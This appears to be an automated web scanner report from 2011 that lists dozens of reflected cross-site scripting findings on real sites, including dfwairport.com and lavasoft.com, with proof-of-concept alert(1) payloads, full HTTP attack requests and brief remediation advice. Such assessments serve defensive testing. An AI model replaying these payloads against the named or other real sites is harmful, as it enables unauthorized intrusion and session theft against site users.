The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d7c"-alert(1)-"1cc2458db2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2dcf2<script>alert(1)</script>518a91a0a09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15b4a"-alert(1)-"3ff7ce65817 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 10e5b<script>alert(1)</script>6e3a323e6bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b47"-alert(1)-"d9497451a76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4389"-alert(1)-"e8fbdc2b414 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba971<script>alert(1)</script>4b785aea6d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fcedb<script>alert(1)</script>4c88d6f4c58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d050e"-alert(1)-"337cc64e2aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8937a"-alert(1)-"f049c6759df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7397c<script>alert(1)</script>03437b72aad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found
Date: Wed, 07 Sep 2011 12:26:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>api/nai/status7397c<script>alert(1)</script>03437b72aad?nocache=0.8315244</strong> ...[SNIP]...
1.142. http://www.dfwairport.com/globalentry/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dfwairport.com
Path: /globalentry/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc0de"><script>alert(1)</script>6b250513e00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /globalentry/?fc0de"><script>alert(1)</script>6b250513e00=1 HTTP/1.1
Host: www.dfwairport.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.143. http://www.dfwairport.com/guide/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dfwairport.com
Path: /guide/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a4f"><script>alert(1)</script>3f28e5e818a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the domain request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b22e'><script>alert(1)</script>8a5fb0d26dc was submitted in the domain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?domain=4b22e'><script>alert(1)</script>8a5fb0d26dc HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<meta name='description' c ...[SNIP]... <a class='login first' href='/mylavasoft/login?destination=/?domain=4b22e'><script>alert(1)</script>8a5fb0d26dc'> ...[SNIP]...
1.145. http://www.lavasoft.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.lavasoft.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bcb9c'><script>alert(1)</script>0c3711a31a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bcb9c'><script>alert(1)</script>0c3711a31a5=1 HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2aba5'><script>alert(1)</script>c2049abbabc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70b40'><script>alert(1)</script>b2096c0958d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9fd00'><script>alert(1)</script>18f3446347d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90845'><script>alert(1)</script>d6c36072837 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a3fd'><script>alert(1)</script>2503f3b109a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cb92c'><script>alert(1)</script>e031a800279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0fcf'><script>alert(1)</script>1bfc0782f6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 71a0f'><script>alert(1)</script>8a0b8342e83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2b62'><script>alert(1)</script>1aabc7e254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 502bc'><script>alert(1)</script>e34a2f2501e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48fb6'><script>alert(1)</script>1d5f7324bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9b696'><script>alert(1)</script>1a92eb01410 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85071'><script>alert(1)</script>dbb72c49636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faae5'><script>alert(1)</script>8317c119fa0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f0b3'><script>alert(1)</script>f688db7b221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1dcf'><script>alert(1)</script>61823a841a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9fbd0'><script>alert(1)</script>fa4d70e4e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81900'><script>alert(1)</script>5e10506606b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ac96e'><script>alert(1)</script>945c7d74830 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.165. http://www.lavasoft.com/img/gradient_black_dgrey_v_100.png [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.lavasoft.com
Path: /img/gradient_black_dgrey_v_100.png
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 54fe6'><script>alert(1)</script>460b86e196a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b048'><script>alert(1)</script>28f692a0d15a4a8ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f69f'><script>alert(1)</script>6a1505323de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5f879'><script>alert(1)</script>e4fcb70e95babf13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e6354'><script>alert(1)</script>745e8b4b2d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7b4d'style%3d'x%3aexpression(alert(1))'ca66c4680d2948ae4 was submitted in the destination parameter. This input was echoed as b7b4d'style='x:expression(alert(1))'ca66c4680d2948ae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a019'style%3d'x%3aexpression(alert(1))'38cb7c2a7e7 was submitted in the destination parameter. This input was echoed as 4a019'style='x:expression(alert(1))'38cb7c2a7e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 160d5'><script>alert(1)</script>ce9b102c404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a6729'><script>alert(1)</script>398b22b03e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7375'><script>alert(1)</script>8ec033ef7c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea828'><script>alert(1)</script>1d6fa491fe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cbb9c'><script>alert(1)</script>9be3172317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea8fd'><script>alert(1)</script>60b6de0a8cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cc93e'><script>alert(1)</script>c92b17aa9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a80a'><script>alert(1)</script>d08343746d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9459e'><script>alert(1)</script>60483082767 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 82edb'><script>alert(1)</script>3e9ba5b1bc6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 450c0'><script>alert(1)</script>e48049f0f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55c3a'><script>alert(1)</script>4cd751fd905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8f4b'><script>alert(1)</script>3e472aa4d6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f909c'><script>alert(1)</script>f2d938a6d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1a65'><script>alert(1)</script>278b2720f83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45a38'><script>alert(1)</script>0315653ed5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3908'><script>alert(1)</script>9a992f154c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57b9a'><script>alert(1)</script>e31a7e2f8d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9b8e3'><script>alert(1)</script>b2e7545d254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b77a'><script>alert(1)</script>236573ae363 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3037e'><script>alert(1)</script>5801b21d286 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78f8b'><script>alert(1)</script>621f0eb0c19 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9147f'><script>alert(1)</script>280704c335d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 53b79'><script>alert(1)</script>c3abaa8a500 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c90a'><script>alert(1)</script>63d1c6ba5a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d73a9'><script>alert(1)</script>7f6206abc9a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e425'><script>alert(1)</script>4fd9962d7ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8570e'><script>alert(1)</script>ce7e18db5c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63e8b'><script>alert(1)</script>c48b6ddd3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19bd4'><script>alert(1)</script>08090652a8b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4100d'><script>alert(1)</script>f6e60007ec8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab356'><script>alert(1)</script>4322317a08b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7668'><script>alert(1)</script>dd59b0cd693 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 11aec'><script>alert(1)</script>9250b34dab5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e9be'><script>alert(1)</script>939406975b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 806ea'><script>alert(1)</script>eb3bcf32647 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f333f'><script>alert(1)</script>8c4d44176a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4b7b'><script>alert(1)</script>d12d2c52918 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7ba62'><script>alert(1)</script>b152347a317 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faf8b'><script>alert(1)</script>aac192f3126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e50cb'><script>alert(1)</script>a488ec66a24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a545a'><script>alert(1)</script>d88e24eab1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49b0c'><script>alert(1)</script>7c44f2e80ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b64a'><script>alert(1)</script>f62241c0c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 183e2'><script>alert(1)</script>bc10062b1a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
